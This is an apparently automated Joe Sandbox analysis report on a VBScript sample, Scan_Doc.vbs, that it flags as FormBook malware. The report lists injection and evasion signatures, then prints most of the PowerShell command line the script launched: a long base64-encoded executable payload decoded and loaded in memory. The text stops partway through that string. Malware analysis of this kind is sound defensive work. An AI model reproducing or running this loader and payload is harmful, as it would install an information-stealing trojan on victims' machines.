Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Scan_Doc.vbs

Overview

General Information

Sample Name:Scan_Doc.vbs
Analysis ID:1272266
MD5:eca38e49a376a162a21d257363a2263e
SHA1:80a99c2a933d454b3654d1a7bca7993c1b1355fb
SHA256:a3fd50cd54fa36cec2ee064e52c91d2106701374fcd3e0ad1e22cbf17479ca71
Tags:vbs
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected FormBook
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Very long command line found
Suspicious powershell command line found
Modifies the prolog of user mode functions (user mode inline hooks)
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Found decision node followed by non-executed suspicious APIs
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Java / VBScript file with very long strings (likely obfuscated code)
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 5700 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scan_Doc.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • powershell.exe (PID: 5468 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('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CCgyAAAKbzMAAAolEQlvNAAACm81AAAKJh8KOGL8//8UEwpyYwMAcBYoSgAABnJ/AwBwKEAAAAooDQAAChMK3holKEEAAAoTCxYrARYsAisIKEIAAAoXK/TeABEKOb0CAAAUEwwfCzgW/P//EQoUcoEDAHAeKEoAAAYXjQYAAAElFnKfAwBwGihKAAAGohQUFChDAAAKKEQAAApyrwMAcBYoSgAABhEIKEUAAAooKgAACowVAAABKEYAAAoTDRENKEcAAAoTDhEOKEgAAAo6HAIAABEKFHLLAwBwHChKAAAGF40GAAABJRYRDqIlEw8UFBeNCAAAASUWF5wlExAoQwAAChEQFpEsHxEPFpooDQAACtAdAAABKBAAAAooSQAACnQdAAABEw4oDQAAChMMFisBFkUGAAAABQAAADEAAACCAAAA3gAAACgBAABXAQAAOHwBAAARDBRy6QMAcBooSgAABheNBgAAASUWcgMEAHAeKEoAAAaiFBQoSgAAChcrshEMFHIfBABwFyhKAAAGF40GAAABJRYfJSgpAAAKcjUEAHAYKEoAAAZyWQQAcB4oSgAABnJjBABwHShKAAAGKEsAAAqiFBQoSgAAChg4Yf///xEMFHKBBABwGChKAAAGF40GAAABJRZylQQAcBooSgAABhEMFHIwBQBwGShKAAAGFo0GAAABFBQUKEMAAAooDQAAChEIKEwAAAooRgAACqIUFChKAAAKGTgF////EQwUckYFAHAWKEoAAAYXjQYAAAElFhEMFHJoBQBwGChKAAAGFo0GAAABFBQUKEMAAAooRAAACihNAAAKohQUKEoAAAoaOLv+//8RDBRyfgUAcBooSgAABheNBgAAASUWcpYFAHAeKEoAAAaiFBQoSgAAChs4jP7//xEMFHKqBQBwGihKAAAGF40GAAABJRYWjAoAAAGiFBQoSgAAChw4Yv7//xEMFHLCBQBwHChKAAAGFo0GAAABFBQUFyhOAAAKJt4aJShBAAAKExEWKwEWLAIrCChCAAAKFyv03gDeEhEMLA0RDCgNAAAKKE8AAAom3AcoPAAACigWAAAGHww4Ufn//ysLByg8AAAKKBYAAAbeGiUoQQAAChMSFisBFiwCKwgoQgAAChcr9N4AKgBBZAAAAAAAAK8DAAAeAAAAzQMAABoAAAAXAAABAAAAAFMEAAAqAgAAfQYAABoAAAAXAAABAgAAAFMEAABGAgAAmQYAABIAAAAAAAAAAAAAAAAAAADMBgAAzAYAABoAAAAXAAABEzAEAKQBAAAAAAAAcswFAHAcKEoAAAZy3gUAcBgoSgAABigEAAArgAgAAAQWKwEWRQkAAAAFAAAAKAAAAEsAAABxAAAAlwAAAL0AAADjAAAACQEAAC8BAAA4UQEAAHLMBQBwHChKAAAGcvgFAHAXKEoAAAYoBQAAK4AJAAAEFyuvciQGAHAZKEoAAAZyNgYAcBwoSgAABigGAAArgAoAAAQYK4xyzAUAcBwoSgAABnJYBgBwGShKAAAGKAcAACuACwAABBk4Zv///3IkBgBwGShKAAAGcoQGAHAbKEoAAAYoCAAAK4AMAAAEGjhA////cswFAHAcKEoAAAZypgYAcBwoSgAABigJAAArgA0AAAQbOBr///9yxAYAcB4oSgAABnLWBgBwGShKAAAGKAoAACuADgAABBw49P7//3LEBgBwHihKAAAGcvwGAHAcKEoAAAYoCwAAK4APAAAEHTjO/v//ciAHAHAWKEoAAAZyLAcAcBwoSgAABigMAAArgBAAAAQeOKj+//9yxAYAcB4oSgAABnJWBwBwGyhKAAAGKA0AACuAEQAABB8JOIH+//8qphcrARYsAA8AKBMAAAYPASgUAAAG0AUAABsoEAAACihQAAAKKA4AACsqAAAbMAwAmwQAAAIAABFydAcAcB4oSgAABgoWKwEWRQgAAAAFAAAAKwAAADwAAABJAAAAVwAAAGMAAABxAAAAfwAAADhYBAAAGI0dAAABJRZynAcAcB4oSgAABqIlF3KsBwBwHShKAAAGogsXK7BzUgAACgeOaW9TAAAKDBgrnwYHCJooRwAACg0ZK5IJc1QAAApvVQAAChorhBYTBBYTBRs4eP///xIG/hUXAAACHDhq////Egf+FRYAAAIdOFz///8SBtAXAAACKBAAAAooVgAACihXAAAKfRcAAAR+EQAABAl+WAAACn5ZAAAKflkAAAoWIAQAAAh+WQAAChQSBhIHb0cAAAYtBnNaAAAKegIfPChbAAAKEwgWKwEWRRUAAAAFAAAAFQAAACQAAAAzAAAAfgAAAIcAAADdAAAA8AAAAPkAAAAeAQAAWQEAAG4BAAB4AQAAkQEAAKUBAAC5AQAA0QEAAOcBAAAbAgAAOgIAAHACAAA4hAIAAAIRCB801ihbAAAKEwkXK5IgswAAAI0KAAABEwoYK4MRChYgAgABAJ4ZOHT///8oXAAAChozG34MAAAEEQd7FAAABBEKbzMAAAYtIXNaAAAKen4LAAAEEQd7FAAABBEKby8AAAYtBnNaAAAKehEKHymUEwsaOCn///8WEwwbOCD///9+DwAABBEHexMAAAQRCx7WEgwaEgVvPwAABi0Gc1oAAAp6EQkRDDMbfhAAAAQRB3sTAAAEEQxvQwAABiwGc1oAAAp6AhEIH1DWKFsAAAoTDRw4yv7//wIRCB9U1ihbAAAKEw4dOLf+//8WEw8eOK7+//9+DQAABBEHexMAAAQRCRENIAAwAAAfQG83AAAGExAfCTiJ/v//ERAtBnNaAAAKen4OAAAEEQd7EwAABBEQAhEOEgVvOwAABi0Gc1oAAAp6EQgg+AAAANYTER8KOE7+//8CEQgc1ihdAAAKF9oTFB8LODn+//8WExUfDDgv/v//OKQAAAACEREfDNYoWwAAChMWHw04Fv7//wIRER8Q1ihbAAAKExcfDjgC/v//AhERHxTWKFsAAAoTGB8POO79//8RFyxQERcX2hfWjTgAAAETGR8QONb9//8CERgRGRYRGY5pKF4AAAofETjA/f//fg4AAAQRB3sTAAAEERARFtYRGREZjmkSBW87AAAGLQZzWgAACnoRER8o1hMRHxI4jP3//xEVF9YTFREVERQ+U////xEQKF8AAAoTEh8TOG39//9+DgAABBEHexMAAAQRCx7WERIaEgVvOwAABi0Gc1oAAAp6AhEIHyjWKFsAAAoTEx8UODf9//8RDywEEQkTEBEKHywREBET1p4fFTge/f//KFwAAAoaMxt+CgAABBEHexQAAAQRCm8rAAAGLSFzWgAACnp+CQAABBEHexQAAAQRCm8nAAAGLQZzWgAACnp+CAAABBEHexQAAARvIwAABhUzBnNaAAAKet5PKEEAAAoWKwEWRQIAAAACAAAAGwAAACshEQd7FQAABChgAAAKKGEAAApvYgAAChcr2ChCAAAKGCvQ3gARBBfWEwQeOH77//8RBBo+9fv//yoAQRwAAAAAAADPAAAAfAMAAEsEAAA7AAAAFwAAATYCAygNAAAKKA4AAAoqHgIoDwAACiou0AoAAAIoEAAACioeAigRAAAKKgAA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V2luMzIAVG9VSW50MzIAVG9JbnQzMgBUb0ludDE2AGdldF9VVEY4ADk2MTkzMmY3YmM0YzQ5MjlhOTgzMGQwMjE3NzZhYmQ4ADxNb2R1bGU+AExvYWRMaWJyYXJ5QQBCAEMARABFAEYAVkFJAFN5c3RlbS5JTwBRQlh0WABQcm9qZWN0RGF0YQBtc2NvcmxpYgBTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYwBNaWNyb3NvZnQuVmlzdWFsQmFzaWMAUHJvY2Vzc0lkAEdldFByb2Nlc3NCeUlkAGJ5dGVzUmVhZAB0aHJlYWQATG9hZABwYXlsb2FkAFN5bmNocm9uaXplZABOZXdHdWlkAFJlcGxhY2UAQ3JlYXRlSW5zdGFuY2UAZ2V0X0dldEluc3RhbmNlAEFuZGUAR2V0SGFzaENvZGUAQ3J5cHRvU3RyZWFtTW9kZQBDb21wcmVzc2lvbk1vZGUARW5kSW52b2tlAEJlZ2luSW52b2tlAEVudW1lcmFibGUAVGhyZWFkSGFuZGxlAFJ1bnRpbWVUeXBlSGFuZGxlAEdldFR5cGVGcm9tSGFuZGxlAFByb2Nlc3NIYW5kbGUAaGFuZGxlAEZpbGUAc2V0X1dpbmRvd1N0eWxlAFByb2Nlc3NXaW5kb3dTdHlsZQBnZXRfTmFtZQBzZXRfRmlsZU5hbWUAYXBwbGljYXRpb25OYW1lAEdldERpcmVjdG9yeU5hbWUASG9tZQBjb21tYW5kTGluZQBDb21iaW5lAENoYW5nZVR5cGUAVmFsdWVUeXBlAFNlY3VyaXR5UHJvdG9jb2xUeXBlAEdldFR5cGUAdHlwZQBTeXN0ZW0uQ29yZQBnZXRfQ3VsdHVyZQBzZXRfQ3VsdHVyZQBBcHBsaWNhdGlvbkJhc2UAQXBwbGljYXRpb25TZXR0aW5nc0Jhc2UAQ2xvc2UAU3RyUmV2ZXJzZQBNdWx0aWNhc3REZWxlZ2F0ZQBEZWxlZ2F0ZUFzeW5jU3RhdGUARWRpdG9yQnJvd3NhYmxlU3RhdGUAR3VpZEF0dHJpYnV0ZQBEZWJ1Z2dlck5vblVzZXJDb2RlQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUARWRpdG9yQnJvd3NhYmxlQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBTdGFuZGFyZE1vZHVsZUF0dHJpYnV0ZQBIaWRlTW9kdWxlTmFtZUF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGUARGVidWdnZXJIaWRkZW5BdHRyaWJ1dGUAQXNzZW1ibHlGaWxlVmVyc2lvbkF0dHJpYnV0ZQBPYmZ1c2NhdGlvbkF0dHJpYnV0ZQBNeUdyb3VwQ29sbGVjdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9